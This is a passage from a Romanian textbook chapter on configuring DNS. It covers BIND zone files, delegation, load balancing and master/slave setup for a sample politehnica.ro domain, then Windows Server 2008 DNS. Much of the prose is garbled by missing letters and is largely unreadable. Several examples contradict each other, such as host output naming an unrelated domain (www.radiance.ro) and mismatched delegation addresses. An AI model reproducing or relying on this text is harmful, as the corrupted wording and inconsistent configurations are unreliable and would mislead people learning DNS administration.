 Domeniul peste care serverul este autoritar este politehnica.ro î fişier este completat
doar cuvântul politehnica, î să a estuia îi este concatenat parametrul $ORIGIN )
 Clasa tutu o î egist ă ilo este IN. A easta este lasa folosită peste tot î I te et.
Introducerea ei este opţio ală.
 Domeniul politehnica.ro a e î egist ă i
o SOA – acest tip de înregistrare are o sintaxa dife ită de ea sta da d şi a di dis utată ai jos.
o TXT – î egist a ea TXT ofe ă u o e ta iu legat de so ietatea e deţi e do e iul
o NS – a eastă î egist a e p e izează se e ul de u e a e a ăspu de la e e ile pe t u a est
domeniu: ns.politehnica.ro (.ro este concatenat de la parametrul $ORIGIN)
o MX - înregistrarea de tip MX a e u fo at spe ial: o p io itate şi apoi ad esa se e ului. P io itatea
defi eşte o di ea î a e u lie t a î e a să o ta teze se e ele de ail ale do e iului; se a
încerca mai întâi conectarea la serverele cu prioritate ai i ă.
259 | D N S
A – fa e posi ilă t adu e ea a estui do e iu ofe i d ad esa IP pe t u politehnica.ro


o
Pentru domeniul politehnica.ro s-a completat numele unui server de e- ail i t a ea MX şi
serverul de nume (intrarea NS). Fiecare dintre acestea, pentru a putea fi rezolvate, are nevoie
de aso ie ea u o ad esa IP. A est lu u este ealizat de u ătoa ele două î egist ă i DN“ de
tip A.
 De ase e ea ai e istă î a î egist ă i A pe t u t adu e ea do e iilo
www.politehnica.ro şi ftp.politehnica.ro. A se o se a faptul ă ele două u e de
domenii au fost date cu nume complet şi î heiate u a a te ul . (punct). Notaţia a easta este
perfect echivalenta cu a scrie: www.politehnica şi ftp.politehnica, având parametrul
$ORIGIN „ro. T e uie a ut ate ţie totuşi la folosi ea a elo otaţii, ă i se poate î ta pla
ca în loc de www.politehnica.ro. , să se o pleteze doa www.politehnica.ro şi să se
uite a a te ul „. , de la sfâ şit. Da ă se o figu ează astfel, domeniul final va fi
www.politehnica.ro.ro, şi de i, e o at.
 Ca o ulti ă o se aţie, o e ta iile di fişie a e au fost fă ute u ajuto ul a a te ului „;
Inregistrarea de de tip SOA a e o si ta ă ai spe ială şi t e uie să fie p i a î egist a e
î fişie ul de zo ă.
domeniu IN SOA server_autoritar adresă_mail_admin (
serial
refresh
retry
expire
ttl
)
 domeniu = politehnica.ro.: “pe ifi ă u ele o plet al do e iului gestio at.

 server_autoritar = ns.politehnica.ro.: P e izează u se e de u e e a fi t i is d ept
ăspu s atu i â d u se poate ăspunde la cerere, dar numele interogat este inclus în
do e iul pe t u a e se e ul este auto ita . A easta se î tâ plă â d u se e slave dă u
ăspu s egati . Î ge e al, a est â p t e uie setat la u ele se e ului master pentru
domeniul respectiv.
 adresă_ ail_ad i = admin.politehnica.ro.: P e izează ad esa de e-mail a
administratorului domeniului, în care caracterul @ este înlocuit cu . (ex: în loc de
admin@politehnica.ro, apare admin.politehnica.ro.)
 serial = 2007092001: I di ă e siu ea azei de date DN“ pe t u do e iu. A eastă se ie este
e ifi ată de se e ele slave pe t u a dete i a da ă este e esa ă o des ă a e a azei de
date de la master. De o i ei se foloseşte o o e ţie a fo atului se iei: AAAALLZZMM, unde
AAAA ep ezi tă a ul, LL luna, DD ziua, iar MM u ă ul odifi ă ii di ziua espe ti ă. A eastă
o e ţie u este o ligato ie, da este i di ată.
Seria bazei de date trebuie incrementată la fiecare modificare făcută în domeniu, altfel
modificările nu se vor propaga la serverele slave.
 refresh = 8H: Co ţi e i te alul de ti p la a e se e ul slave va interoga seria bazei de date a
serverului master. Implicit acest timp este exprimat în secunde, dar valoarea câmpului refresh
poate exprima minutele - da ă se foloseşte sufi ul M, orele - da ă se foloseşte sufi ul H, sau
zilele - da ă se foloseşte sufi ul D.
 retry = 2H: I di ă i te alul de ti p la a e se e ul slave a î e a să se e o e teze la
serverul master, da ă o î e a e de o e ta e la se e a eşuat.
 expire = 1W: I di ă pe ioada de ti p după a e aza de date a se e ului slave este i alidată,
da ă u se euşeşte o o e ta e la se e ul master.
 ttl = 1D: ‘ep ezi tă ti pul de iaţă pe t u ăspu su i egati e. A est ti p este dife it de
ti pul de iaţa al ăspu su ilo poziti e.
260 | ‘ e ţ e l e L o a l e
7.2.3.5.4 Co figurarea fişierului de zo ă pe tru rezolvarea i versă

Î a est o e t se e ul DN“ a fost o figu at pe t u ezol a e di e tă. Î o ti ua e se
a e e plifi a şi fişie ul de zo ă pe t u ezol a ea i e să: db.111.100.142.in-addr.arpa
$ORIGIN 100.142.in-addr.arpa.
111 IN SOA ns.politehnica.ro. nsmaster.politehnica.ro. (
2007092001 ; Serial
8H ; Refresh
2H ; Retry
1W ; Expire
1D ; Negative TTL
)
TXT “Universitatea Plitehnica Bucuresti”
NS ns.politehnica.ro.
$ORIGIN 111.100.142.in-addr.arpa.
21 PTR ftp.politehnica.ro.
25 PTR mail.politehnica.ro.
80 PTR www.politehnica.ro.
Exceptând înregistrarea SOA, pentru domeniul 111.100.142.in-addr.arpa se adaugă o

î egist a e te t de des ie e a do e iului, u a pe t u se e ul de u e şi alte î egist ă i
de tip pointer pentru rezolvarea 21.111.100.142.in-addr.arpa în ftp.politehnica.ro,
25.111.100.142.in-addr.arpa în mail.politehnica.ro şi 80.111.100.142.in-
addr.arpa în www.politehnica.ro.
Î s he a de ai jos su t p eze tate fişie ele eate/editate/des ise î se ţiu ea de ai
sus şi odul î a e fie a e o t i uie la t adu e ea di e tă şi i e să a do e iului
politehnica.ro
politehnica.ro
rezolvare directă rezolvare i e să
db.politehnica.ro Named.conf.local db.111.100.142.in-

addr.arpa
7-3: Fişiere de o figurare
7.2.3.6 Verificarea serverului DNS

Se e o a dă u ă i ea e e plului de ai sus şi i ple e ta ea a estuia pe o staţie
lo ală, fii d o o figu aţie si plă de se e DN“, a e a o stitui aza pe t u o figu aţii ai
avansate.
7.2.3.7 Verificarea sintaxei

Di pă ate, î ealiza ea p i elo o figu ă i de DN“ se poate g eşi foa te uşo la si ta a
destul de st i tă a fişie elo de o figu a e. De a eea se e ul BIND pu e la dispoziţie două
utilita e u a e se poate e ifi a fişie ul p i ipal de o figu a e alătu i de toate fişie ele
incluse în acesta şi fişie ele de zo ă. A estea se u es : named-checkconf şi named-
checkzone.
261 | D N S
waters@myr:/etc/bind# named-checkconf
waters@myr:/etc/bind# named-checkzone politehnica.ro. /etc/bind/db.politehnica.ro
zone politehnica.ro/IN: loaded serial 2007092001
OK
waters@myr:/etc/bind# named-checkzone 111.100.142.in-addr.arpa
/etc/bind/db.111.100.142.in-addr.arpa
zone 111.100.142.in-addr.arpa/IN: loaded serial 2007092001
OK
7.2.3.8 Testarea fu țio ării

Pe t u a putea testa u a fu ţio a e a do e iului politehnica.ro, va t e ui să se
esta teze se i iul i d şi să se i te ogheze se e ul u utilita ul host.
root@myr:/etc/bind# /etc/init.d/bind9 restart
user@orange:/etc/bind# host www.politehnica.ro 142.100.111.53
Using domain server:
Name: 142.100.111.53
Address: 142.100.111.53#53
Aliases:
www.politehnica.ro has address 142.100.111.80
user@orange:/etc/bind# host -t PTR 80.111.100.142.in-addr.arpa

80.111.100.142.in-addr.arpa domain name pointer www.politehnica.ro.
La apelarea utilitarului host s-a folosit şi a gu e tul . . . pi a e s-a

spe ifi at ad esa se e ului DN“ pe a e host a t e ui să îl i te ogheze; i eî ţeles a ea
adresa IP este adresa IP a serverului pe care s-au fă ut o figu ă ile de ai sus. “e o se ă ă
ele i te ogă i efe tuate u utilita ul host su t ezol ate u su es de ăt e se e ul DN“.
Este o a de ezol a ea di e tă a ad esei www.politehnica.ro în 142.100.111.80 şi de
ezol a ea i e să a 142.100.111.80 în www.politehnica.ro.
7.2.3.9 BIND9 debugging

Deşi BIND i lude ele două utilita e, named-checkconf pe t u e ifi a ea fişie ului
p i ipal de o figu a e şi named-checkzone pentru verificarea zonelor, acestea u ofe ă
întotdeauna cele mai intuitive mesaje de eroare. Din acest motiv, în continuare se vor
prezenta scenarii de debugging ai î ăpăţâ ate şi su sa g eşelilo di a estea.
10. Eroarea numelor

Cea ai î tâl ită g eşeală este fă ă î doiala uita ea pu tului. Cea ai u ă i di atie
asupra acestui fapt este eroarea: ignoring out-of-zone data. A easta poate î se ă totuşi şi
faptul ă u ele de do e iu este s is g eşit î “OA sau ă zo a a e u ele s is g eşit î
definirea acesteia din fisierul named.conf.local.
11. Eroarea copy-paste

A â d î ede e si ta a o pli ată BIND, se e o a dă păst a ea u o template-uri care
să fie folosite la o figu aţii oi. Î să t e uie foa te ultă ate ţie la opie ea di t -u fişie î
altul deoarece simpla copiere a unui spaţiu î plus, luat odată u u ele de do e iu, poate să
ute a a te ul „. ai la d eapta şi să ezulte î a eastă e oa e: not a valid number.
12. E oa ea e apo tată

U a di ele ai g eu de depistat e o i o stă î a s rie greşit u ele de ale al fişie ului
de zo ă î fişie ului named.conf.local. Deşi se e ul DN“ u a fu ţio a pe t u espe ti a
zo ă, a esta a po i fă ă să ofe e o e oa e. De ase e ea i iu ul di utilita ele named-check
u apo tează e a î e egulă.
262 | ‘ e ţ e l e L o a l e
Pe t u alte g eşeli o u e şi pu te heie a e p esupu o ate ţie spo ită, se poate

consulta RFC19121 a e t atează to ai a este su ie te.
7.2.3.10 Efi ie tizarea si ta ei fişierelor de zo ă

Deşi fişie ul de zo ă o figu at ai sus este o e t spe ifi at, e istă u ele i i a tifi ii de
si ta ă a e su t î tâl ite destul de des î i ple e ta ea u ui se e DN“ şi a e t e uie
ştiute de o i e ad i ist ato de BIND.
1. O ite ea u elui de do e iu e se epetă o se uti .

Pe t u î eput se poate o se a ă î fişie ul db.politehnica.ro, dat ca exemplu mai
sus, domeniul politehnica.ro a a ut î egist ă i dife ite: “OA, TXT, MX, N“, A. “i ta a DN“
ge e ală pe t u o î egist a e este:
nume_domeniu ttl clasa tip informatii // înregistrare DNS
Cu â tul „politeh i a a apă ut de i de o i a u e de domeniu. Acest lucru nu este

eapă at e esa . Atu i â d u ele de do e iu este la fel pe t u î egist ă ile e u ează,
acesta poate fi omis:
[...]
2007092001 ; Serial
8H ; Refresh
2H ; Retry
1W ; Expire
1D ; Negative TTL
)
TXT "Universitatea Plitehnica Bucuresti"
NS ns.politehnica
MX 10 mail.politehnica
A 142.100.111.53
ns.politehnica IN A 142.100.111.53
[...]
2. “i olul „@
E istă ulte e e ple de o figu aţii BIND pe I te et. Multe di a estea o ţi î fişie ul
de zo a si olul „@ . “i olul a esta este e hi ale t u a gu e tul di e ti ei $ORIGIN. În
e e plul de ai jos, a s ie „politeh i a. o. sau a s ie „@ a a ea a elaşi efe t. De i u alt
od de a s ie fişie ul db.politehnica.ro este u ăto ul:
$ORIGIN politehnica.ro.
$TTL 36000
@ IN SOA ns.politehnica.ro. admin.politehnica.ro. (
2007092001 ; Serial
8H ; Refresh
2H ; Retry
1W ; Expire
1D ; Negative TTL
)
NS ns
MX 10 mail
A 142.100.111.53
ns IN A 142.100.111.53
mail IN A 142.100.111.25
www IN A 142.100.111.80
ftp IN A 142.100.111.21
“e o se ă ă a gu e tul $ORIGIN a fost s hi at di „ o. î „politeh i a. o. , ia î

lo ul u elui de do e iu di faţa î egist ă ii “OA, s-a introdus simbolul „@ . Acesta este
perfect echivalent cu a scrie politehnica.ro.
1
http://www.ietf.org/rfc/rfc1912.txt
263 | D N S
Î o ti ua e, la î egist ă ile TXT, N“, MX şi A, u s-a mai introdus simbolul „@ ,

conform regulii de la punctul 1. De asemenea cu cât directiva $ORIGIN este ai up i zătoa e
u atât fişie ul ai ae isit şi iti ea sa ai uşoa ă.
3. Redefinirea parametrului $ORIGIN
Sintaxa DNS permite redefinirea parametrului $ORIGIN pentru o mai mare flexibilitate a
fişie elo de zo ă.
$ORIGIN ro.
$TTL 36000
2007092001 ; Serial
8H ; Refresh
2H ; Retry
1W ; Expire
1D ; Negative TTL
)
NS ns.politehnica
MX 10 mail.politehnica
A 142.100.111.53
ns IN A 142.100.111.53
mail IN A 142.100.111.25
www IN A 142.100.111.80
ftp IN A 142.100.111.21
Î fişie ul de ai sus, pe t u p i ele î egist ă i, u ele a e u se te i ă u

a a te ul „. , o fi o pletate u „ro. . Pe t u u ătoa ele î egist ă i pa a et ul
$O‘IGIN a fost s hi at, de i u ele se o o pleta u „politehnica.ro.
7.2.3.11 Configurarea unui alias DNS

Pe t u a o figu a u alias DN“ se foloseşte î egist area CNAME. Un nume canonic nu
poate fi configurat decât pentru un subdomeniu al domeniului peste care serverul este
autoritar. În caz contrat oricine ar putea realiza un alias pentru google.com a e să se t adu ă
într-u IP do it. Co figu a ea ofe ită a exemplu ca crea f1.politehnica.ro ca alias pentru
www.politehnica.ro.
[...]
www IN A 142.100.111.80
f1 IN CNAME www
[...]
După u se poate edea şi di i te oga e, f1.politehnica.ro a fi t adus î a elaşi IP

a şi www.politehnica.ro.
root@myr:/etc/bind# host www.politehnica.ro 142.100.111.53
Name: 142.100.111.53
Address: 142.100.111.53#53
Aliases:
user@orange:/etc/bind# host f1.politehnica.ro 142.100.111.53
Name: 142.100.111.53
Address: 142.100.111.53#53
Aliases:
Verificarea cu argumentul –t CNAME ofe ă di e t ezultatul alias-ului:

waters@myr:~$ host -t CNAME f1.politehnica.ro 142.100.111.80
Name: 142.100.111.80
Address: 142.100.111.80#53
264 | ‘ e ţ e l e L o a l e
Aliases:
f1.politehnica.ro is an alias for www.politehnica.ro.
7.3 Configurări avansate DNS

7.3.1 Delegarea unui subdomeniu DNS.
Delegarea DNS este un proces ce a stat la baza întregii ierarhii a protocolului. Pentru a
analiza acest concept se va o side a o situaţie î a e u ad i ist ato de eţea do eşte să îşi
cumpere un domeniu de la ROTLD (Romanian Top Level Domain), cu numele: poliadmin.ro.
‘OTLD, a e deţi e do e iul „.ro , a t e ui să delege autoritatea pentru subdomeniul pe
care îl vinde. Mai exact, autoritatea ROTLD va crea de acum o asociere între IP-ul pe care
ad i ist ato ul îl a asig a staţiei e găzduieşte se e ul de u e şi do e iul poliadmin.ro.
A eastă aso ie e a putea fi o u i ată de ăt e TLD-ul „.ro , o i ă ui se e di I te et
a e a do i să o afle.
Mai ult, ad i ist ato ul a e a u pă at do e iul poliadmin.ro, poate delega mai
departe subdomenii din acesta: foxxy.poliadmin.ro, suzy.poliadmin.ro, etc. Când
serverul de nume autoritar peste poliadmin.ro a p i i o e e e e e u si ă pe t u
domeniul suzy.poliadmin.ro, a ăspu de u ad esa IP a se e ului de u e ă uia a
delegat autoritatea pentru respectivul subdomeniul.
Singura înregistrare cu care se poate realiza delegarea de domenii este înregistrarea NS.
Pentru a clarifica mai bine acest concept se va continua exemplul de mai sus cu delegarea
subdomeniului cs.politehnica.ro. ‘ăspu zăto de a est su do e iu este se e ul de
nume ns.cs.politehnica.ro. Adresa acestuia (142.100.222.53 a fi spe ifi ată p i t -o
înregistrare de tip A.
P o esul de delega e a e lo de fapt î fişie ul de zo ă db.politehnica.ro. Fisierul va
a ăta astfel:
$TTL 36000
@ IN SOA ns.politehnica.ro. admin.politehnica.ro. (
2007092001 ; Serial
8H ; Refresh
2H ; Retry
1W ; Expire
1D ; Negative TTL
)
NS ns
MX 10 mail
A 142.100.111.53
ns IN A 142.100.111.53
mail IN A 142.100.111.25
www IN A 142.100.111.80
ftp IN A 142.100.111.21
; urmează partea de delegare

cs NS ns.cs
ns.cs A 142.100.222.53
Ulti ele li ii di fişie ep ezi tă delega ea do e iului cs.politehnica.ro ăt e

serverului de nume ns.cs.politehnica.ro, de pe staţia u IP-ul 142.100.22.53. Înregistrarea
de tip N“ spe ifi ă se e ul de u e pe t u u ele cs.politehnica.ro, iar înregistrarea de
tip A aso iaza se e ul de u e u u IP. A u auto itatea a fost delegată. Nu ai ă â e
de ât să se o figu eze se e ul pe t u cs.politehnica.ro, pe t u a a ea i e să ăspu dă
la o cerere pentru acest domeniu.
Co figu a ea de u ge î od ase ă ăto u ea pe t u se e ul auto ita do e iului
politehnica.ro.
265 | D N S
Î fişie ul de zo e se adaugă o si gu ă i t a e de zo ă, ea o espu zătoa e ezol ă ii

directe a domeniului cs.politehnica.ro:
zone "cs.politehnica.ro" {
type master;
file "/etc/bind/db.cs.politehnica.ro";
};
Pe t u fişie ul de zo ă db.cs.politehnica.ro se adaugă a eleaşi tipu i de î egist ă i a

în cazul db.politehnica.ro, cu exceptia î egist ă ilo o espu zătoa e delegă ii de
subdomeniu.
$TTL 36000
cs IN SOA ns.cs.politehnica.ro. admin.cs.politehnica.ro. (
2007092001 ; Serial
8H ; Refresh
2H ; Retry
1W ; Expire
1D ; Negative TTL
)
TXT "Computer Science Department"
NS ns.cs
MX 10 mail.cs
A 142.100.222.53
$ORIGIN cs.politehnica.ro.
ns A 142.100.222.53
www A 142.100.222.80
ftp A 142.100.222.21
mail A 142.100.222.25
“e o se ă
si ila itatea foa te ae a o figu aţiei fişie ului de zo ă
db.cs.politehnica.ro u fişie ul db.politehnica.ro. E epţiile o stau î u ele de
do e iu şi ad esele IP.
7.3.2 Efectuarea DNS load-balancing.

Cu ajuto ul se e ului DN“ se poate i ple e ta o fo ă destul de p i iti ă de load
balancing, în care clientul va primi într-o maniera round-robin1 un IP dintr-o listă de IP-uri.
Astfel da ă lie ţi o fa e âte o e e e fie a e, o p i i IP-uri diferite. Implementarea
efe ti ă este destul de si plă î se e ul BIND şi p esupu e e iste ţa a ai ulte î egist ă i
de tip A pe t u a elaşi u e de do e iu.
[...]
www IN A 142.100.111.80
IN A 142.100.111.81
IN A 142.100.111.82
ftp IN A 142.100.111.21
[...]
“e o se ă u la ealiza ea u o e e i u ajuto ul utilita ului host, se e ul ăspunde cu

o listă de IP-uri permutata într-o maniera round-robin. De obicei un client care va primi 3
ăspu su i de tip A, îl a alege pe p i ul şi le a ig o a pe estul.
waters@myr:~$ host www.politehnica.ro 142.100.111.53
Name: 142.100.111.53
Address: 142.100.111.53#53
Aliases:
www.radiance.ro has address 142.100.111.80

waters@myr:~$ host www.radiance.ro 142.100.111.53
Name: 142.100.111.53
Address: 142.100.111.53#53
Aliases:
1
pa u ge e se e ţială a u ei liste circulare
266 | ‘ e ţ e l e L o a l e

waters@myr:~$ host www.radiance.ro 142.100.111.53
Name: 142.100.111.53
Address: 142.100.111.53#53
Aliases:
7.3.3 Configurarea DNS Master/Slave.

Majoritatea serverelor DNS implementate într-u s e a iu eal au î o po e ţă şi u
se e sla e aflat pe o aşi a fizi ă sepa ată a e să poată i te e i î azul î a e aste ul
a î eta să ai fu ţio eze. La u i te al spe ifi , se e ul a opia fişie ele de zo ă de la
aste şi astfel se a păst a î totdeau a si o izat u a esta. Co figu aţia de aste sla e
este p eze tată î o ti ua ea e e plului de ază folosit î a est apitol pe t u do e iul
politehnica.ro.
Î p i ul â d, fişie ul de zo ă a t e ui odifi at pe t u a ofe i o t adu e e şi pe t u
se e ul de u e a e este sla e. “e o i t odu e două î egist ă i N“, î lo de u a, pe t u
ambele severe de nume.
$TTL 36000
@ IN SOA ns1.politehnica.ro. admin.politehnica.ro. (
2008090501 ; Serial
8H ; Refresh
2H ; Retry
1W ; Expire
1D ; Negative TTL
)
NS ns1.politehnica.ro.
NS ns2.politehnica.ro.
MX 10 mail.politehnica.ro.
A 142.100.111.53
ns1 IN A 142.100.111.53
ns2 IN A 142.100.99.1
mail IN A 142.100.111.25
www IN A 142.100.111.80
ftp IN A 142.100.111.21
T e uie fă ute două o se aţii legate de fişie ul de ai sus:

 deşi s-au defi it două se e e N“, doa aste ul este i t odus î î egist a ea “OA
 se e ul s şi s su t lo alizate pe aşi i dife ite IP-u i dife ite î î egist ă ile de tip A ;
edu da ţa este dusă hia ai depa te p i faptul a ele două aşi i se află în subneturi
diferite cu masca /24.
U ează defi i ea zo elo pe t u fie a e se e . Co figu ă ile se o fa e di e t î fişie ul
principal de o figu a e fă ă a ai folosi named.conf.options şi named.conf.local)
Serverul master a a ea u ătoa ea i t a e de zo ă î named.conf:
type master;
file "/etc/bind/db.politehnica.ro";
notify yes;
also-notify {
141.85.37.33;
193.230.31.225;
};
allow-transfer {
142.100.99.1
};
};
O se aţii:
 tipul serverului este setat ca master
267 | D N S
 directiva notify: atu i â d a eastă di e ti ă este folosită şi setata la aloa ea yes, la fiecare
s hi a e a fişie ului de zo ă se o t i ite esaje spe iale de NOTIFY tuturor serverelor slave
a e su t spe ifi a e î fişie ul de zo ă p i î egist a ea NS adi ă se e ele de u e u
î egist ă i NS, în afara de cel master care este specificat în SOA).
 directiva allow-transfer: pe ite t a sfe ul doa ăt e se e ul slave cu IP-ul spe ifi at. Da ă
a easta di e ti ă a lipsi, o i e se e a putea să des a e o figu aţiile de zo ă de la master.
 directiva also-notify: este folosită pe t u a otifi a şi alte se e e, a e se află de o i ei ai sus
î ie a hia DN“, de s hi a ea u ui fişie de zo ă. Este t i is tot u esaj de tip NOTIFY,
odată u esajele t i ise şi se e elo slave.
 ele opţiu i specificate prin directivele de mai sus se vor aplica doar zonei
politehnica.ro! Da ă a estea a fi fost i t oduse î named.conf.options sub directiva
glo ală options, acestea s-ar fi aplicat global.
I t a ea de zo ă di fişie ul de o figu a e al se e ului sla e a a ăta astfel:
type slave;
file "/etc/bind/db_slave.politehnica.ro.txt";
masters { 142.100.111.53; };
allow-notify { 142.100.111.53; };
};
O se aţii:
 tipul serverului de nume este slave
 directiva masters: i di ă slave-ului IP-ul serverului master de la a e să îşi des a e o figu aţia
 directiva allow-notify: spe ifi ă se e ele master de la care acest slave a eptă otifi ă i
7.4 Configurarea unui server DNS pe Windows Server 2008

Bu a fu ţio a e a u ui siste de ezol a e a u elo ep ezi tă o o po e tă heie î
o i e siste de ope a e o ie tat sp e eţea. Î săşi fu ţio a ea u ei eţele se azează pe
posi ilitatea a e tităţile e o fo ează să se poată lo aliza î t e ele. Î o se i ţă, odul de
rezol a e a u elo t e uie să fie fle i il şi o ust. De ase e ea, este de p efe at a a esta să
ade e sta da delo , di pu t de ede e al i te ope a ilităţii şi al s ala ilităţii.
Pentru Windows Server 2008, DNS (Domain Name System ep ezi tă p i ipala
odalitate de ezol a e a u elo şi, totodată, ep ezi tă o o po e tă de ază a o i ă ei
infrastructuri de tip Active Directory.
O alte ati ă la DN“ folosită de u ii ad i ist ato i este WIN“ Windows Internet Name
Service), un serviciu de rezolvare a nu elo azat pe NetBIO“ a e ealizează aso ie i î t e
ad esele IP ale staţiilo di t -o eţea şi u ele lo NetBIO“, sto â du-le într-o ază de date
di a i ă si dist i uită.
NetBIOS Net o k Basi I put/Output “ ste ep ezi tă u p oto ol e ulează peste
1
TCP/IP şi pe ite al ulatoa elo di t -o eţea să o u i e pe aza pe aza u uia sau a ai
ulto u e de tip NetBIO“. NetBIO“ ofe ă se i ii di atego ia i elului sesiu e al sti ei O“I.
Atât WIN“ ât şi DN“ ep ezi tă odalităţi de ezol a e a u elor, disponibile pe
siste ele Wi do s. WIN“ ealizează ezol a ea u elo î spaţiul de u e NetBIO“, î ti p
e DN“ le ezol ă î spaţiul de u e al do e iilo DN“. Î ge e al, WIN“ este folosit atât de
ăt e lie ţii e foloses e siu i ai e hi de Wi do s, ât şi de apli aţiile azate pe NetBIO“.
Windows 2000, XP, “e e şi “e e foloses şi u e DN“, pe lâ gă ele ofe ite de
NetBIOS.
1
NetBIO“ peste TCP/IP ai este p es u tat şi NBT.
268 | ‘ e ţ e l e L o a l e
7.4.1 )nstalare şi configurare

Instalarea serviciului DNS pentru Windows Server 2008 se ealizează p i adăuga ea unui
rol al serverului. Folosind Server Manager se a esează i te faţa Add Server Roles şi se
sele tează DN“ “e e di listă. “e o ti uă i stala ea, ţi â d o t de e o a da ea de a a ea
o figu ată ad esă stati ă pe i te faţa pe a e se do eşte a se e ul DN“ să ăspu dă
cererilor. Server Manager a ate ţio a î azul î a e u dete tează i io i te faţă
o figu ată stati .
DN“ se o upă, î p i ipal, u zo ele de ezol a e di e tă forward lookup zones), care
ealizează o e sia di u e î ad ese IP. De ase e ea, el se o upă şi de o e sia i e să,
din adrese IP în nume (reverse lookup).
7.4.1.1 Co figurarea i ițială şi rearea u ei zo e

După i stala e, i te faţa de ad i ist a e a se e ului DN“ pote fi a esată de la Start >
Administrative Tools > DNS. Co figu a ea i iţială se poate ealiza de la e iul Action >
Configure a DNS Server. Î etapele e u ează se o e e plifi a o se ie de a ţiu i şi
o figu ă i pe t u a pu e î e ide ţă p i ipalele fa ilităţi ale se e ului:
1. Pentru început, se alege tipul de zo ă e a fi eată. “e poate alege di t e: forward lookup
zone, forward and reverse lookup zones sau root hints. “e a ea o zo ă de ezol a e di e tă
(forward lookup).
7-4: Alegerea zonei
2. În continuare, se spe ifi ă da ă se e ul lo al este espo sa il pe t u zo ă sau deţi e doa o

copie read-only a zo ei o figu ate pe u alt se e . “e e ge pe p i a opţiu e.
269 | D N S
7-5: Alegerea serverului principal pentru zo ă
3. “e i t odu e u u e pe t u zo a eată. A esta este FQDN-ul său Fully Qualified Domain

Name).
7-6: Numele zonei
4. Fişie ul de o figu aţie al zo ei poate fi u ul ou sau e istă opţiu ea de a î ă a o

o figu aţie di t -u fişie deja e iste t, eat pe u alt se e . Fişie ele de o figu aţie su t de
tip te t, î fo at A“CII şi su t lo alizate î %systemroot%\system32\dns. Se va crea un
fişie ou:
7-7: Fişierul de o figurație al zo ei
5. U ătoa ea pagi ă spe ifi ă da ă zo a a a epta sau u a tualiză i di a i e. Da ă

a tualiză ile di a i e su t a ti e, lie ţii DN“ o putea să îşi î egist eze şi să îşi a tualizeze
p op iile î t ă i ‘‘ – Resource Records). În acest caz este important de verificat identitatea
su selo de la a e soses a este a tualiză i pe t u a e ita i se a ea de i fo aţii o upte î
fişie ele de o figu aţie. Pe t u a est e e plu se a alege Allow both secure and nonsecure
updates:
270 | ‘ e ţ e l e L o a l e
7-8: A tualizări di a i e
6. La pasul u ăto se alege o po ta e tul pe t u e e ile pe a e se e ul u le poate ezol a

di e t. E istă opţiu ea de a forward-a e e ile sp e alte se e e sau de a î e a să rezolve
astfel de cereri începând de la root servers, fă ă a le forward-a ai depa te. “e alege opţiu ea
ea di u ă:
7-9: Forward-area cererilor spre alte servere
7.4.1.2 Proprietăți ale ser erului DN“

Pentru a a esa p op ietăţile a a sate ale se e ului DN“ se alege opţiu ea Properties din
e iul o te tual al se e ului o ţi ut la li d eapta pe u ele se e ului, di i te faţa de
administrare).
Î fe east a de p op ietăţi a se e ului su t dispo i ile opţiu ile g upate î u ătoa ele
cateogorii:
 Interfaces: Cup i de i te feţele de eţea pe a e se e ul DN“ a as ulta e e i. Pot fi sele tate
auto at toate i te feţele a ti e sau se pot sele ta doa a u ite i te feţe, după ad esele IP
(recomandabil, statice), IPv4 sau IPv6.
271 | D N S
 Forwarders: ‘ep ezi tă a eeaşi listă de se e e e putea fi o pletată şi la o figu a ea

i iţială: se e ele di a eastă listă o fi o ta tate pe t u e e ile pe a e se e ul DN“ u le
poate rezolva singur.
 Advanced: Opţiu ile a a sate i lud a ti a ea sau deza ti a ea e e ilo e u si e şi totodată
a utiliză ii se e elo de forwarding), posibilitatea de compatibilitate cu serverele BIND (spre
e e plu pe t u azul î a e se foloseşte u astfel de se e a se e se u da ,
comportame tul la e o ile di fişie ele de o figu a e a zo elo , round-robin î fu ţie de
p io ităţi1, setul de a a te e al u elo a eptate î e e i, şa d.
7-10: Opțiu i a a sate ale ser erului DN“
 Root hints: Lista de servere ce sunt contactate pentru zonele ce nu sunt configurate local în
se e ul DN“, î azul î a e u e istă se e e de forwarding sau a estea u ăspu d.
 Debug logging: Pe t u a sup a eghea fu ţio a ea se e ului, pot fi î egist ate î t -u fişie
i fo aţii desp e pa hetele a e i ulă p i se e ul DN“. “e poate sele ta di e ţia i t a e,
ieşi e , p oto olul folosit TCP, UDP şi e tipu i de pa hete o fi otate. De ase e ea, se
poate aplica un filtru pentru a selecta pachetele în fu ţie de ad esa IP de la a e soses sau
spre care sunt destinate (Figura 7-11).
 Event logging: “e e ul DN“ poate e ţio a î ju ale dife itele e e i e te e apa î
de u sul ulă ii sale, a e o i şi a e tis e te. Aici se poate configura care dintre acestea vor
apă ea î ju ale.
 Monitoring: Ai i pot fi efe tuate o se ie de teste asup a fu ţio ă ii se e ului, folosi d e e i
recursive sau nerecursive. Se pot efectua teste imediate sau la intervale regulate, iar
rezultatele lor sunt evaluate.
1
Round- o i a ti at di p op ietăţile se e ului se fa e la i el de se e şi u la i el de zo ă.
272 | ‘ e ţ e l e L o a l e
7-11: Opțiu i de debug
7.4.1.3 Proprietăți ale i trărilor DN“ î Windows Server 2008

O zo a DN“ o ţi e di e se tipu i de i t ă i, u ite resource records ‘‘ . Ele su t ese ţa
unei zo e DN“, ofe i d i fo aţii desp e u e, ad ese şi, î u ele azu i, desp e u ele
servicii.
Pe t u adăuga ea u ui ou resource record, a â d sele tată zo a do ită, di pa oul de
a ţiu i se alege tipul de i t a e e se do eşte a fi eată.
Tipurile de int ă i supo tate de se e ul DN“ pe Windows Server 2008 se o fo ează
standardului descris în RFC 1035 – Domain names: Implementation and specification:
 A (host): Mapează o u u e la o ad esă IP. O i t a e de tipul A î fişie ul de o figu aţie a ată
în felul u ăto :
storage A 192.168.1.12
Folosi d i t ă ile A, se poate i ple e ta o teh i ă de load balancing de u ită şi round-robin

DNS, î a e, su t defi ite ai ulte i t ă i de tip A u a elaşi u e da ad ese IP dife ite,
astfel ă u lie t a e i te oghează se e ul DN“ a e o a u ită p o a ilitate de a p i i
ad esa u ui a u ite staţii. Teh i a este utilă î o e tul î a e se do eşte s ăde ea
î ă ă ii asup a u ui se e p i i stala ea ai ulto se e e e ofe ă a elaşi se i iu şi
ep ezi tă o soluţie foa te si plă deşi u eo i i efi ie tă, î p a ti ă de dist i ui e u ifo ă a
e e ilo sp e se e e. Tot î p a ti ă, t e uie ţi ut o t de faptul ă u lie t Windows 2000
sau XP a păst a î cache-ul lo al i fo aţia desp e p i ul se e a ă ui ad esă a o ţi ut-o în
